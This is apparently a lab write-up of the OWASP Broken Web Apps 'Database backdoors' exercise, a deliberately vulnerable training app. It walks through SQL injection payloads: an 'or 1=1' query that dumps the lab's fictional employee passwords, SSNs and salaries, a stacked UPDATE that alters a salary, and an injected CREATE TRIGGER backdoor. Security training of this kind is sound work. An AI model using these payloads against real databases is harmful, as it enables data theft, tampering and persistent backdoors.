OwaspBWA - Database backdoors

Injection Flaws - Database backdoors


  •  input : 101    <<<< ID

Result :
User IDPasswordSSNSalaryE-Mail
101larry386-09-545155000larry@stooges.com


  • input : o
result : Column not found: O in statement
[select userid, password, ssn, salary, email from employee where userid=o]
                                                   ^                                ^
                                           Column target            Table target

  • try to injection
select userid, password, ssn, salary, email from employee where userid=101 or 1=1';

Result :
User IDPasswordSSNSalaryE-Mail
101larry386-09-545155000larry@stooges.com
102moe936-18-4524140000moe@stooges.com
103curly961-08-004750000curly@stooges.com
104eric445-66-556513000eric@modelsrus.com
105tom792-14-636480000tom@wb.com
106jerry858-55-445270000jerry@wb.com
107david439-20-9405100000david@modelsrus.com
108bruce707-95-9482110000bruce@modelsrus.com
109sean136-55-1046130000sean@modelsrus.com
110joanne789-54-241390000joanne@modelsrus.com
111john129-69-4572200000john@guns.com
112socks111-111-1111450000neville@modelsrus.com

  • Complete Injection 
105; UPDATE employee SET salary=99999 WHERE userid=105




Stage 2: Use String SQL Injection to inject a backdoor or DB worm

Sql Injection Stetement
105; CREATE TRIGGER myBackDoor
BEFORE INSERT ON employee
FOR EACH ROW BEGIN 
UPDATE employee SET email='john@hackme.com'
WHERE userid = 105


Full SQL Statement Query
select userid, password, ssn, salary, email 
from employee 
where userid=105; CREATE TRIGGER myBackDoor 
BEFORE INSERT ON employee 
FOR EACH ROW BEGIN 
UPDATE employee SET email='john@hackme.com'
WHERE userid = 105


result
User IDPasswordSSNSalaryE-Mail
105tom792-14-636499999tom@wb.com

*Note* that nothing will actually be executed
because the current underlying DB doesn't support triggers.